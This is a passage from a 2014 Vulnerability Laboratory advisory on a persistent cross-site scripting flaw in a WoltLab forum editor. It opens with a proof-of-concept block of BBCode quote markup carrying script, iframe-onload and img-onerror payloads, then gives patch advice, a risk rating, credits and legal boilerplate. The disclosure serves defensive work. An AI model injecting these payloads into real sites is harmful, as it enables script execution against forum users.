 		<textarea name="text" id="text" rows="15" cols="40" tabindex="9">[quote='Ateeq Ur Rehman Khan',index.php?page=Thread&postID=23#post23]\'">

">[img]x[/img][size=10][align=center] [/align][/size][/align][/size][size=10][align=center][align=center]\'"><sCrIpt><iframe%20src=x%20onload=confirm

(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>[/align]

"><img onerror=prompt(/POC/) src=x></img>
">[/align][/size][/align][/size][size=10][align=center]" wcf_src="\'">[/align][/size][size=10][align=center]



Reference(s):
http://localhost:8080/forum/index.php?form=PostAdd&postID=23&action=quote
http://localhost:8080/forum/index.php?form=ThreadAdd&boardID=23



Picture(s):
				../1.png
				../2.png
				../3.png
				../4.png
				../5.png
				../6.png
				../7.png
				../8.png
				../9.png
				../10.png


Resource(s):
				../Reply - direct execute test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm
				../Edit post - test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the `mce_editor_0_codeview` module context on reverse requests through quote-, multiquote- or edit- post.
An Upgrade of v3.9.1 pl1 to v4.x can solve the editor issues fully. Update also the com.woltlab.wcf.form.message.wysiwyg editor core components to prevent the issue.
The version 4.x is not affected by the vulnerability and has already upgraded components which prevent an execution of script codes in the editor.


Security Risk:
==============
The security risk of the persistent validation vulnerability and encoding filter issue in the editor is estimated medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com